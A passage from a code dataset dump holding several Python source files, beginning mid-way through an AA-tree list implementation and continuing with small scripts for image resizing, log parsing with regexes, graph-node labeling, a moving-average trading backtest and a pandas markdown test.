tree. rootnode must have a valid annotation, and its parent and children must be None.\"\"\"\n self.op = operation\n self.root = rootnode\n def _update(self, node, sentinel=None):\n \"\"\"node must be an internal node\"\"\"\n while node is not sentinel:\n #oldval = node.annotation\n node.annotation = self.op(node.leftchild.annotation, node.rightchild.annotation)\n #if oldval == node.annotation:\n # #this node has not changed, so nodes above it will also not have changed\n # break\n #else:\n node = node.parent\n _update_add = _update\n _update_del = _update\n def _split_link(self, node):\n \"\"\"Introduce and return a new node (newparent) between node and its parent\"\"\"\n newparent = self.makenode()\n newparent.parent = node.parent\n if node.parent is not None:\n if node.parent.leftchild is node:\n node.parent.leftchild = newparent\n else:\n assert node.parent.rightchild is node\n node.parent.rightchild = newparent\n else:\n self.root = newparent\n node.parent = newparent\n return newparent\n def addleft(self, new, old):\n \"\"\"\n Add a new leaf node to the left of an old leaf node. 
The new node's\n parent will be assigned to be a new internal node.\n @type new: makenode\n @param new: a new node, not yet present in the tree\n @type old: makenode\n @param old: A leaf node currently in the tree.\n \"\"\"\n newparent = self._split_link(old)\n newparent.rightchild = old\n newparent.leftchild = new\n new.parent = newparent\n self._update_add(newparent)\n def addright(self, new, old):\n \"\"\"\n Add a new leaf node to the right of an old leaf node. The new node's\n parent will be assigned to be a new internal node.\n @type new: makenode\n @param new: a new node, not yet present in the tree\n @type old: makenode\n @param old: A leaf node currently in the tree.\n \"\"\"\n newparent = self._split_link(old)\n newparent.rightchild = new\n newparent.leftchild = old\n new.parent = newparent\n self._update_add(newparent) \n def add(self, new, walker):\n \"\"\"\n Add a new leaf node at a position determined by walker. Acts as a\n thin wrapper around L{aatree.descend} and addleft or addright.\n If the walker descent process returns a position of zero, the new node\n will be added left of the returned node.\n @type new: makenode\n @param new: a new node to add to the tree.\n @type walker: L{Walker}\n @param walker: A walker that will determine the insertion position\n \"\"\"\n leaf, position = descend(self.root, walker)\n assert leaf.leftchild is None\n assert leaf.rightchild is None\n if position == 1:\n self.addright(new, leaf)\n else: #Makes left the default for duplicate values\n self.addleft(new, leaf)\n def remove(self, leaf):\n \"\"\"\n Remove a leaf node. The leaf will be removed from the tree, and the\n tree will retain no reference to it.\n @type leaf: makenode\n @param leaf: A leaf node to remove.\n \"\"\"\n p = leaf.parent\n if p.leftchild is leaf:\n sibling = p.rightchild\n else:\n assert p.rightchild is leaf\n sibling = p.leftchild\n gp = p.parent\n if gp.leftchild is p:\n gp.leftchild = sibling\n elif gp.rightchild is p:\n gp.rightchild = sibling\n sibling.parent = gp\n # The only remaining reference to p is now in leaf itself, and the only\n # remaining reference to leaf is in the user's hands\n self._update_del(gp)\n def change_annotation(self, leaf, newann):\n \"\"\"\n When changing the annotation of a leaf, it is required to use this method,\n so that the change may be propagated up through the tree according to the\n operation. Note that no such method is needed for the value of a leaf,\n because the value is opaque to the tree.\n @type leaf: makenode\n @param leaf: the node whose annotation should be altered\n @type newann: element of the monoid set\n @param newann: the new annotation which should be associated with leaf\n \"\"\"\n assert leaf.leftchild is None\n assert leaf.rightchild is None\n leaf.annotation = newann\n self._update(leaf.parent)\n def getnext(self, leaf, skip=None):\n \"\"\"\n Get the next rightward leaf node from leaf. Optionally, skip any nodes\n meeting some criterion.\n @type leaf: makenode\n @param leaf: The leaf node whose next rightward neighbor will be returned\n @type skip: f(makenode)->bool\n @param skip: An optional function returning True if a given node should\n be skipped. This function will be called on each internal node during\n the search, not only on leaf nodes. 
It will typically implement a \n criterion on the annotation such that a node will be skipped only\n if every descendant of that node would also be skipped if considered\n individually.\n \"\"\"\n assert leaf.leftchild is None\n assert leaf.rightchild is None\n node = leaf\n while ((node.parent is not None) and\n ((node.parent.rightchild is node) or \n ((skip is not None) and skip(node.parent.rightchild)))):\n # Move up until you can move right\n node = node.parent\n if (node.parent is not None) and (node.parent.leftchild is node):\n node = node.parent.rightchild\n while node.leftchild is not None:\n # Move down, staying as far left as possible.\n assert node.rightchild is not None\n if (skip is not None) and skip(node.leftchild):\n node = node.rightchild\n else:\n node = node.leftchild\n return node\n else:\n raise StopIteration(\"No next node\")\n \n def _build_subtree(self, nodes):\n #FIXME: This cannot be helpful because insertion of a subtree requires\n #rebalancing the main tree by more than one level, which is not possible\n #with a single invocation of skew and split\n L = len(nodes)\n if L == 1:\n return nodes[0]\n else:\n next = []\n sentinel = 'g' #must not be None, since None is the root sentinel\n if L % 2:\n n2 = nodes.pop()\n n1 = nodes.pop()\n newnode = self.makenode()\n newnode.parent=sentinel #totally arbitrary constant\n newnode.leftchild = n1\n n1.parent = newnode\n newnode.rightchild = n2\n n2.parent = newnode\n self._update_add(newnode, sentinel)\n nodes.append(newnode) \n for i in xrange(0,L,2):\n n1,n2 = nodes[i:(i+2)]\n newnode = self.makenode()\n newnode.parent=sentinel #totally arbitrary constant\n newnode.leftchild = n1\n n1.parent = newnode\n newnode.rightchild = n2\n n2.parent = newnode\n self._update_add(newnode, sentinel)\n \n \n\nclass SumWalker(Walker):\n \"\"\"\n SumWalker is designed to walk over full trees where each leaf has annotation 1\n and the monoid is +. 
Target is the zero-indexed position of the target node.\n \n There is one exception: the last node in every tree has annotation 0.\"\"\"\n target = None\n offset = None\n def prepare_descend(self, target):\n self.target = target\n self.offset = 0\n def descend(self, node):\n if node.annotation == 0: #empty leaf at the last position\n assert self.target == self.offset\n return -1\n elif node.leftchild is None: #leaf node case\n assert node.rightchild is None\n assert self.target == self.offset\n return 0\n else: #internal node case\n p = self.offset + node.leftchild.annotation\n if p <= self.target:\n self.offset = p\n return 1\n else:\n return -1\n def prepare_ascend(self):\n self.target = 0\n def ascend(self, node):\n if node.parent is not None:\n if node.parent.rightchild is node:\n self.target += node.parent.leftchild.annotation\n else:\n assert node.parent.leftchild is node\n return True\n else:\n return False\n \nclass TreeList:\n \"\"\"Implements a list-like interface, backed by a MonoidTree\"\"\"\n _treetype = MonoidTree\n def __init__(self):\n self._makenode = self._treetype.makenode\n r = self._makenode()\n r.annotation = 0\n from operator import add\n self._tree = self._treetype(add, r)\n self._walker = SumWalker()\n # We regard the fields of this walker as public API, and manipulate\n # them directly\n self._index = {}\n def __len__(self):\n return self._tree.root.annotation\n def _getnode(self, i):\n self._walker.prepare_descend(i)\n node, pos = descend(self._tree.root, self._walker)\n assert pos == 0\n return node\n def __getitem__(self, s):\n if isinstance(s, int):\n node = self._getnode(s)\n return node.value\n else:\n raise NotImplementedError\n def __setitem__(self, s, v):\n if isinstance(s, int):\n if s < len(self):\n node = self._getnode(s)\n oldv = node.value\n self._index[oldv].remove(node)\n if not self._index[oldv]:\n del self._index[oldv]\n node.value = v\n if v not in self._index:\n self._index[v] = set()\n self._index[v].add(node)\n else:\n self.insert(s, v)\n else:\n raise NotImplementedError\n def __delitem__(self, s):\n if isinstance(s, int):\n if s < len(self):\n node = self._getnode(s)\n oldv = node.value\n self._index[oldv].remove(node)\n if not self._index[oldv]:\n del self._index[oldv]\n self._tree.remove(node)\n else:\n raise NotImplementedError\n def insert(self, p, v):\n if p > len(self):\n raise IndexError(\"Index out of range\")\n self._walker.prepare_descend(p)\n newnode = self._makenode()\n newnode.annotation = 1\n newnode.value = v\n self._tree.add(newnode, self._walker)\n if v not in self._index:\n self._index[v] = set()\n self._index[v].add(newnode)\n def index(self, v):\n \"\"\"index returns some index such that self[i] == v. 
No promises about ordering.\"\"\"\n self._walker.prepare_ascend()\n for node in self._index[v]: #Pull one arbitrary node out of the set\n assert node.value == v\n ascend(node, self._walker)\n break\n return self._walker.target\n\nclass TreeHideList:\n \"\"\"Implements the EagerHideList interface, backed by a MonoidTree\"\"\"\n _treetype = MonoidTree\n class MultiSumWalker(Walker):\n index = 0\n target = 0\n offset = 0\n def prepare_descend(self, target, index):\n self.index = index\n self.target = target\n self.offset = 0\n def descend(self, node):\n if node.annotation == (0,0): #empty leaf at the last position\n assert self.target == self.offset\n return -1\n elif node.leftchild is None: #leaf node case\n assert node.rightchild is None\n assert self.target == self.offset\n return 0\n else: #internal node case\n p = self.offset + node.leftchild.annotation[self.index]\n if p <= self.target:\n self.offset = p\n return 1\n else:\n return -1\n def prepare_ascend(self, index):\n self.target = 0\n self.index = index\n def ascend(self, node):\n if node.parent is not None:\n if node.parent.rightchild is node:\n self.target += node.parent.leftchild.annotation[self.index]\n else:\n assert node.parent.leftchild is node\n return True\n else:\n return False\n \n @staticmethod \n def op(a,b):\n # Convention: a[0] is visible elements. a[1] is all elements.\n return (a[0] + b[0], a[1] + b[1])\n \n @staticmethod\n def skip(node):\n return node.annotation[0] == 0\n\n def __init__(self):\n self._makenode = self._treetype.makenode\n r = self._makenode()\n r.annotation = (0, 0)\n self._tree = self._treetype(self.op, r)\n self._walker = self.MultiSumWalker()\n # We regard the fields of this walker as public API, and manipulate\n # them directly\n self._index = {}\n unique = True\n if unique:\n self._index_lookup = self._index.__getitem__\n self._index_assign = self._index.__setitem__\n else:\n self._index_lookup = self._index_lookup_set\n self._index_assign = self._index_assign_set\n def _index_lookup_set(self, item):\n for v in self._index[item]:\n return v\n def _index_assign_set(self, key, value):\n if key not in self._index:\n self._index[key] = set()\n self._index[key].add(value)\n def __len__(self):\n return self._tree.root.annotation[0]\n def _getnode(self, i, a):\n self._walker.prepare_descend(i, a)\n node, pos = descend(self._tree.root, self._walker)\n assert (pos == 0) or ((pos == -1) and (i == len(self)))\n return node\n def __getitem__(self, s):\n if isinstance(s, int):\n if s < len(self): #FIXME: negative indices\n node = self._getnode(s, 0)\n return node.value\n else:\n raise IndexError(\"Index out of range\")\n else:\n start, stop, stride = s.indices(len(self))\n if start == stop:\n return []\n elif stride == 1:\n # runs in k + log(N) (amortized)\n nodes = [self._getnode(start,0)]\n k = stop - start\n while len(nodes) < k:\n nodes.append(self._tree.getnext(nodes[-1],self.skip))\n return [n.value for n in nodes]\n else:\n #FIXME: runs in k*log(N), could be reduced to k*log(step) + log(N)\n return [self[i] for i in xrange(start,stop,stride)]\n def index(self, v, visible=True):\n \"\"\"index returns some index such that self[i] == v. 
No promises about ordering.\"\"\"\n self._walker.prepare_ascend(0 if visible else 1)\n node = self._index_lookup(v) #Pull one arbitrary node out of the set\n assert node.value == v\n ascend(node, self._walker)\n return self._walker.target\n def hide(self, position, length):\n #self.__getitem__ is eager, so we acquire the list of nodes before\n #acting on them\n node = self._getnode(position,0)\n for i in xrange(position+1,position+length):\n self._tree.change_annotation(node,(0,1))\n node = self._tree.getnext(node, self.skip)\n self._tree.change_annotation(node,(0,1))\n #FIXME: runs in length*log(N). Could be reduced using a priority queue,\n #possibly to length + log(N)\n def getitem_all(self, s):\n if isinstance(s, int):\n node = self._getnode(s, 1)\n return node.value\n else:\n #FIXME: runs in k*log(N), could be reduced to k + log(N) by linked list\n #slice.indices requires the sequence length; use the count of all\n #elements, which is the second component of the root annotation\n return [self.getitem_all(i) for i in xrange(*s.indices(self._tree.root.annotation[1]))]\n def index_all(self, item):\n return self.index(item, False)\n def is_visible(self, i):\n node = self._getnode(i, 1)\n return node.annotation[0] == 1\n def is_visible_item(self, item):\n node = self._index_lookup(item)\n return node.annotation[0] == 1\n def insert_sequence_all(self, position, sequence, visibility):\n node = self._getnode(position,1)\n self._insert_sequence_leftofnode(node, sequence, visibility)\n def insert_sequence_leftof(self, target, sequence, visibility):\n node = self._index_lookup(target)\n self._insert_sequence_leftofnode(node, sequence, visibility)\n def _insert_sequence_leftofnode(self, node, sequence, visibility):\n for i in xrange(len(sequence)):\n v = sequence[i]\n viz = visibility[i]\n newnode = self._makenode()\n newnode.annotation = (1 if viz else 0, 1)\n newnode.value = v\n self._tree.addleft(newnode, node)\n self._index_assign(v, newnode)\n\n# Skew, split, and decrease_level are the AA balancing functions, as described\n# at http://en.wikipedia.org/wiki/AA_tree . 
They have been modified\n# substantially here to (1) maintain bidirectional linking and (2) maintain\n# monoid annotations.\ndef skew(node, op=None):\n L = node.leftchild\n if (L is not None) and node.level == L.level:\n node.leftchild = L.rightchild\n if node.leftchild is not None:\n node.leftchild.parent = node\n L.rightchild = node\n L.parent = node.parent\n node.parent = L\n if L.parent is not None:\n if L.parent.leftchild is node:\n L.parent.leftchild = L\n else:\n assert L.parent.rightchild is node\n L.parent.rightchild = L\n if op is not None:\n L.annotation = node.annotation\n node.annotation = op(node.leftchild.annotation, node.rightchild.annotation)\n assert L.annotation == op(L.leftchild.annotation, L.rightchild.annotation)\n # This assertion is the condition of associativity, guaranteed for any\n # valid monoid operation.\n return L\n else:\n return node\n\ndef split(node, op=None):\n R = node.rightchild\n if ((R is not None) and \n (R.rightchild is not None) and \n (node.level == R.rightchild.level)):\n node.rightchild = R.leftchild\n node.rightchild.parent = node\n \n R.leftchild = node\n R.parent = node.parent\n node.parent = R\n \n R.level += 1\n \n if R.parent is not None:\n if R.parent.leftchild is node:\n R.parent.leftchild = R\n else:\n assert R.parent.rightchild is node\n R.parent.rightchild = R\n \n if op is not None:\n R.annotation = node.annotation\n node.annotation = op(node.leftchild.annotation, node.rightchild.annotation)\n assert R.annotation == op(R.leftchild.annotation, R.rightchild.annotation)\n # This assertion is the condition of associativity, guaranteed for any\n # valid monoid operation.\n \n return R\n else:\n return node\n\ndef decrease_level(node):\n # Decrease the level of node if necessary. Returns true if a modification\n # was made.\n target = min(node.leftchild.level, node.rightchild.level) + 1\n if target < node.level:\n node.level = target\n if target < node.rightchild.level:\n node.rightchild.level = target\n return True\n return False\n\nclass AAMonoidTree(MonoidTree):\n makenode = AANode\n def _update_add(self, node, sentinel=None):\n \"\"\"node must be an internal node one level above the leaves, with\n two leaves itself.\"\"\"\n node.level = 2\n while node is not sentinel:\n #oldval = node.annotation\n node.annotation = self.op(node.leftchild.annotation, node.rightchild.annotation)\n node = skew(node, self.op)\n node = split(node, self.op)\n if node.parent is None:\n self.root = node\n node = node.parent\n def _update_del(self, node, sentinel=None):\n while node is not sentinel:\n #oldval = node.annotation\n #oldlevel = node.level\n node.annotation = self.op(node.leftchild.annotation, node.rightchild.annotation)\n \n decrease_level(node)\n \n node = skew(node, self.op)\n node.rightchild = skew(node.rightchild, self.op)\n if node.rightchild.rightchild is not None:\n node.rightchild.rightchild = skew(node.rightchild.rightchild, self.op)\n node = split(node, self.op)\n node.rightchild = split(node.rightchild, self.op)\n \n #if (oldval == node.annotation) and (oldlevel == node.level):\n # #Nodes above this point will not have changed\n # break\n \n if node.parent is None:\n self.root = node\n node = node.parent\n\nclass AATreeList(TreeList):\n _treetype = AAMonoidTree\n\nclass AATreeHideList(TreeHideList):\n _treetype = AAMonoidTree\n","sub_path":"lib/groupthink/aatree.py","file_name":"aatree.py","file_ext":"py","file_size_in_byte":29845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} 
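A minimal usage sketch for the aatree record above (illustrative only, not part of the dataset dump: it assumes the embedded file is importable as `aatree` and runs under Python 2, which the module's use of `cmp` and `xrange` implies; the letter values are invented):

    from aatree import AATreeList

    tl = AATreeList()            # list interface backed by an AA-balanced monoid tree
    tl.insert(0, 'a')            # ['a']
    tl.insert(1, 'c')            # ['a', 'c']
    tl.insert(1, 'b')            # ['a', 'b', 'c'] -- positional insert steered by SumWalker
    assert len(tl) == 3          # the root's annotation counts the leaves
    assert tl[1] == 'b'          # descent compares the target index against left-subtree counts
    assert tl.index('c') == 2    # ascent re-accumulates the index from left siblings
    tl[2] = 'd'                  # ['a', 'b', 'd']; changing a value bypasses the tree entirely
    assert tl.index('d') == 2

The sketch exercises only the documented public API (insert, __getitem__, __setitem__, index); remove is left out because its grandparent access assumes the removed leaf has at least two internal ancestors.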
+{"seq_id":"653616405","text":"from PIL import Image\nimport os, sys\nfrom subprocess import Popen\n\n\n\ndir_path = \"download\"\n\ndef resize_im(path):\n if os.path.isfile(path):\n # dm = Image.open(path)\n # dm.save(os.path.join(parent_dir, img_name)+'.jpg', 'JPEG')\n im = Image.open(path).resize((100,100), Image.ANTIALIAS)\n parent_dir = os.path.dirname(path)\n img_name = os.path.basename(path).split('.')[0]\n im.save(os.path.join(parent_dir, img_name + '.jpg'), 'JPEG', quality=90)\n\ndef resize_all(mydir):\n for subdir , _ , fileList in os.walk(mydir):\n for f in fileList:\n try:\n full_path = os.path.join(subdir,f)\n resize_im(full_path)\n except Exception as e:\n try:\n os.remove(full_path)\n print('Unable to resize %s.Hence deleted' % full_path)\n except Exception as e:\n print(\"Important! undeleteable unrecognised file found: %s\" % full_path)\n\n\ndef bat():\n p = Popen(\"rename.bat\")\n stdout, stderr = p.communicate()\n\nif __name__ == '__main__':\n bat()\n resize_all(dir_path)","sub_path":"datasetbot 9000/ImageResizer.py","file_name":"ImageResizer.py","file_ext":"py","file_size_in_byte":1137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"594966385","text":"f = open(\"scores.txt\", \"w\")\n\nwhile True:\n # ask for input\n participant = input(\"Participant name: \")\n\n # break out of loop\n if participant == \"quit\":\n print(\"Quit.\")\n break\n\n # ask for score\n score = input(\"Score for \" + participant + \": \")\n\n # write to file and add new file\n f.write(participant + \",\" + score + \"\\n\")\n\nf.close()\n","sub_path":"01-introduction-to-python/file-writer-example.py","file_name":"file-writer-example.py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"631682010","text":"import logging\nimport numpy as np\nimport operator\nimport random\nfrom sklearn.cluster import KMeans\nimport torch\nfrom tqdm import tqdm\n\nclass Labeler():\n def __init__(self, features, labels, n_classes, idx_train, idx_val, idx_test):\n self.features = features\n self.labels = labels\n self.n_instances = len(self.labels)\n self.n_classes = n_classes\n self.idx_train = idx_train\n self.idx_val = idx_val\n self.idx_test = idx_test\n\n def get_knn_labels(self, knn):\n fake_labels = self.labels.clone()\n\n new_features = self.features.cpu().numpy()\n\n # 1. prepare training and test data\n train_X, train_y = new_features[self.idx_train], self.labels[self.idx_train]\n val_X, val_y = new_features[self.idx_val], self.labels[self.idx_val]\n\n if knn == -1:\n # 2. KNN -- selecting the optimal K based on validation set\n upper = len(self.idx_train) // 10\n K_list = [i*10 for i in range(1, upper+1)]\n cnt_same = {K: 0 for K in K_list}\n for i, (X, y) in tqdm(enumerate(zip(val_X, val_y))):\n diff = train_X - X\n dist = np.einsum('ij, ij->i', diff, diff)\n indice = np.argsort(dist)\n\n for K in K_list:\n selected_labels = train_y[indice[:K]]\n\n unique, count = np.unique(selected_labels, return_counts=True)\n\n assert(fake_labels[self.idx_val[i]] == y)\n label_list = unique[np.argwhere(count == np.amax(count)).flatten().tolist()].tolist()\n\n if y in label_list:\n cnt_same[K] += 1\n\n cnt_same = sorted(cnt_same.items(), key=operator.itemgetter(1))\n logging.info('cnt_same = {}'.format(cnt_same))\n best_K = cnt_same[-1][0]\n else:\n best_K = knn\n\n logging.info('best_k = {}'.format(best_K))\n\n # 3. 
KNN -- assign labels to validation nodes and testing nodes\n idx_test = list(set(range(self.n_instances)) - set(self.idx_train))\n test_X, test_y = new_features[idx_test], self.labels[idx_test]\n\n cnt_same_tot = 0\n for i, (X, y) in tqdm(enumerate(zip(test_X, test_y))):\n diff = train_X - X\n dist = np.einsum('ij, ij->i', diff, diff)\n indice = np.argsort(dist)\n\n selected_labels = train_y[indice[:best_K]]\n\n unique, count = np.unique(selected_labels, return_counts=True)\n\n assert(fake_labels[idx_test[i]] == y)\n label_list = unique[np.argwhere(count == np.amax(count)).flatten().tolist()].tolist()\n fake_labels[idx_test[i]] = random.sample(label_list, 1)[0]\n if y == fake_labels[idx_test[i]]:\n cnt_same_tot += 1\n\n logging.info('cnt_same / cnt_all = {} / {}'.format(cnt_same_tot, len(test_X)))\n return fake_labels\n\n\n def get_majority_labels(self, edges, assign_seed):\n fake_labels = self.labels.clone()\n\n np.random.seed(assign_seed)\n idx_unknown = list(set(range(self.n_instances)) - set(self.idx_train))\n neighbor = {idx : [0 for i in range(self.n_classes)] for idx in idx_unknown}\n for dst, src in edges.tolist():\n if dst in idx_unknown and src in idx_unknown:\n neighbor[src][np.random.randint(0, self.n_classes)] += 1\n neighbor[dst][np.random.randint(0, self.n_classes)] += 1\n elif dst in idx_unknown:\n neighbor[dst][self.labels[src]] += 1\n elif src in idx_unknown:\n neighbor[src][self.labels[dst]] += 1\n\n cnt_same = 0\n for idx, l in neighbor.items():\n fake_labels[idx] = int(np.argmax(l))\n if self.labels[idx] == fake_labels[idx]:\n cnt_same += 1\n\n logging.info('cnt_same / cnt_all = {} / {}'.format(cnt_same, len(neighbor)))\n return fake_labels\n\n\n def get_naive_labels(self, assign_seed):\n fake_labels = self.labels.clone()\n np.random.seed(assign_seed)\n idx_test = list(set(range(self.n_instances)) - set(self.idx_train))\n fake_labels[idx_test] = np.random.randint(0, self.n_classes, len(idx_test))\n return fake_labels\n\n\n def get_cluster_labels(self, features, n_clusters, quota=[], start=0, same_size=False):\n estimator = KMeans(init=f'k-means++', n_clusters=n_clusters, n_init=10)\n km = estimator.fit(features)\n\n if not same_size:\n return torch.LongTensor(km.labels_)\n\n else:\n d = km.transform(features)\n indice = np.zeros_like(d.T, dtype=int)\n for i, col in enumerate(d.T):\n indice[i,:] = np.argsort(col)\n\n labels = [-1] * len(features)\n ptr = [-1] * n_clusters\n nums = [0] * n_clusters\n while 1:\n flag = False\n for i, (a, b) in enumerate(zip(nums, quota)):\n if a < b:\n flag = True\n break\n\n if not flag:\n break\n\n for i in range(n_clusters):\n if nums[i] == quota[i]: continue\n while 1:\n ptr[i] += 1\n if labels[indice[i][ptr[i]]] == -1:\n labels[indice[i][ptr[i]]] = i\n nums[i] += 1\n break\n\n labels = np.asarray(labels) + np.repeat(start, len(labels))\n\n return torch.LongTensor(labels)\n\n\n def get_kmeans_labels(self, n_clusters=10, knn=-1, cluster_method='kmeans', same_size=False):\n fake_labels = self.get_knn_labels(knn)\n\n labels_vec = np.zeros((self.n_instances, self.n_classes))\n labels_vec[range(self.n_instances), fake_labels] = 1\n\n features = np.hstack((self.features.numpy(), labels_vec))\n\n if same_size:\n size = self.n_instances // n_clusters\n rem = self.n_instances % n_clusters\n quota = [size+1] * rem + [size] * (n_clusters-rem)\n logging.info(f'quota = {quota}')\n return self.get_cluster_labels(features, n_clusters, quota=quota, same_size=True)\n\n else:\n return self.get_cluster_labels(features, n_clusters)\n\n\n def 
get_random_labels(self, n_clusters=10, seed=42):\n np.random.seed(seed)\n return torch.LongTensor(np.random.randint(0, n_clusters, self.n_instances))\n\n\n def get_equal_size(self, total, size):\n total, size = int(total), int(size)\n rem = total % size\n num = total // size\n if rem == 0:\n return num, [size] * num\n\n v1 = (rem - 1) // num + 1\n v2 = (size - rem) // (num + 1)\n\n if v1 > v2:\n num += 1\n\n size = total // num\n rem = total % num\n\n return num, [size+1] * rem + [size] * (num-rem)","sub_path":"labeler.py","file_name":"labeler.py","file_ext":"py","file_size_in_byte":6946,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"499557754","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nTASK_FAILED = \"task_failed\"\nTASK_COMPLETED = \"task_completed\"\n\nclass SlaveMsg:\n def __init__(self, tid, state, extra=None):\n self.tid = tid\n self.state = state\n self.extra = extra\n\n def __str__(self):\n s = \"SM: TID %s STATE %s\" % (self.tid, self.state)\n if self.extra:\n s += \" EXTRA %s\" % (self.extra,)\n\n return s\n\n\nFILE_READY = \"file_ready\"\n\nclass MasterMsg:\n def __init__(self, tid, cmd, fl=None):\n self.tid = tid\n self.cmd = cmd\n self.fl = fl\n\n def __str__(self):\n s = \"MM: TID %s CMD %s FL: %s\" % (self.tid, self.cmd, self.fl)\n return s\n","sub_path":"common/Protocol.py","file_name":"Protocol.py","file_ext":"py","file_size_in_byte":695,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"40792945","text":"#Heather Stafford\n#5/9/18\n#fileDemo.py - how to read a file\n\nfile = open('engmix.txt')\n\nnumWords = 0\n\nfor line in file:\n if 'heath' in line:\n print(line.strip())\n numWords += 1\n \nprint(numWords)\n","sub_path":"fileDemo.py","file_name":"fileDemo.py","file_ext":"py","file_size_in_byte":211,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"195359880","text":"\"\"\"\nThe program takes a file with logs\nand processes them with regular expressions\nin order to parse IP addresses and write\nthe matches out to a separate file\n\"\"\"\nimport re\n\n\ndef openFile():\n\n file = enter_filename()\n regexps = enter_regExp()\n with open(file) as f:\n for log in f: # iterate over the lines of the file\n for regexp in regexps: # iterate over the regular expressions\n lst_total = re.findall(regexp, log)\n for log_write in lst_total:\n with open(f\"NameOutputFile_{str(file).split('.')[0]}.{str(file).split('.')[-1]}\", \"a\") as f:\n f.write(f\"{log_write}\\n\")\n continue\n return regexps\n\n\ndef enter_regExp():\n regexps = [r'\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}', r'\\\"(.+)\\sHTTP.+?\\\"', ]\n while True:\n regexp = input(\"Please enter a regular expression: \")\n if regexp != \"end\":\n regexps.append(regexp)\n continue\n else:\n break\n return regexps\n\n\ndef enter_filename():\n filename = input(\"Please enter your filename\")\n if filename == \"\": filename = \"test.log\"\n return filename\n\n\nif __name__ == '__main__':\n openFile()\n","sub_path":"Major.py","file_name":"Major.py","file_ext":"py","file_size_in_byte":1355,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"617533761","text":"# encoding: utf-8\n# The idea for this strategy comes from: https://www.quantopian.com/posts/mebane-fabers-tactical-asset-allocation\n# The strategy buys when the price rises above the k-day moving average, and exits otherwise\n\nimport datetime\nimport numpy as np\nimport pandas as pd\nimport sys\nimport argparse\n\nsys.path.append(\"../jsalpha/\")\n\nfrom backtest 
import Backtest\nfrom data import HistoricCSVDataHandler\nfrom event import OrderEvent\nfrom portfolio import Portfolio\nfrom strategy import Strategy\nfrom fetch import fetch_from_wind\nimport utils\n\nclass mebane_faber(Strategy):\n\n def __init__(self, bars, events, look_back=20):\n self.bars = bars\n self.symbol_list = self.bars.symbol_list\n self.events = events\n self.bought = self._calculate_initial_bought()\n self.look_back = look_back\n\n def _calculate_initial_bought(self):\n bought = {}\n for s in self.symbol_list:\n bought[s] = 'OUT'\n return bought\n\n def calculate_signals(self, event):\n if event.type == \"MARKET\":\n for symbol in self.symbol_list:\n bars = self.bars.get_latest_bars_values(symbol, \"close\", self.look_back)\n if bars.shape[0] < self.look_back:\n continue\n\n price = self.bars.get_latest_bar_value(symbol, \"close\")\n sma = bars.mean()\n if price > sma and self.bought[symbol] == 'OUT':\n order = OrderEvent(symbol, 'ALLBUY')\n self.events.put(order)\n self.bought[symbol] = 'LONG'\n if price < sma and self.bought[symbol] == 'LONG':\n order = OrderEvent(symbol, 'EXIT')\n self.events.put(order)\n self.bought[symbol] = 'OUT'\n\n # allow short\n if price < sma and self.bought[symbol] == 'OUT':\n order = OrderEvent(symbol, 'ALLSELL')\n self.events.put(order)\n self.bought[symbol] = 'SHORT'\n if price > sma and self.bought[symbol] == 'SHORT':\n order = OrderEvent(symbol, 'EXIT')\n self.events.put(order)\n self.bought[symbol] = 'OUT'\n\ndef get_args():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--symbols\", help=\"securities\", default=\"000300.SH\", type=str)\n args = parser.parse_args()\n return args\n\nif __name__ == \"__main__\":\n csv_dir = \"../csv/\"\n args = get_args()\n start_date = \"2005-01-01\"\n end_date = \"2017-02-09\"\n symbol_list = args.symbols.split(',')\n fetch_from_wind(csv_dir, symbol_list, start_date, end_date)\n initial_capital = 100000.0\n heartbeat = 0.0\n\n backtest = Backtest(csv_dir,\n symbol_list,\n initial_capital,\n heartbeat,\n start_date,\n HistoricCSVDataHandler,\n Portfolio,\n mebane_faber)\n backtest.simulate_trading(plot=True)\n","sub_path":"strategy/mebane_faber.py","file_name":"mebane_faber.py","file_ext":"py","file_size_in_byte":3037,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"398550378","text":"\"\"\"\nWrite a program to compute the harmonic number; this algorithm is defined by:\n\n F(N) = 1/1 + 1/2 + 1/3 + 1/4 ... 
+ 1/N\n\n(N): The number of terms in the sequence.\n\n i=N\n ∑ (1/i)\n i=1\n\n\"\"\"\n\nsuma = 0\nn = int(input(\"N: \"))\n\nfor i in range(1, n+1):\n suma += 1/i # 1/1, 1/2, 1/3, 1/4, 1/5\n\n# for i in range(3)\n# [0, 1, 2]\n\n# for i in range(1, 3+1)\n# [1, 2, 3]\n\nprint(f\"The sum is: {round(suma, 4)}\")\n","sub_path":"2021-1/s2/ej5.py","file_name":"ej5.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"465605097","text":"from io import StringIO\n\nimport pytest\n\nimport pandas as pd\n\npytest.importorskip(\"tabulate\")\n\n\ndef test_simple():\n buf = StringIO()\n df = pd.DataFrame([1, 2, 3])\n df.to_markdown(buf=buf)\n result = buf.getvalue()\n assert (\n result == \"| | 0 |\\n|---:|----:|\\n| 0 | 1 |\\n| 1 | 2 |\\n| 2 | 3 |\"\n )\n\n\ndef test_other_tablefmt():\n buf = StringIO()\n df = pd.DataFrame([1, 2, 3])\n df.to_markdown(buf=buf, tablefmt=\"jira\")\n result = buf.getvalue()\n assert result == \"|| || 0 ||\\n| 0 | 1 |\\n| 1 | 2 |\\n| 2 | 3 |\"\n\n\ndef test_other_headers():\n buf = StringIO()\n df = pd.DataFrame([1, 2, 3])\n df.to_markdown(buf=buf, headers=[\"foo\", \"bar\"])\n result = buf.getvalue()\n assert result == (\n \"| foo | bar 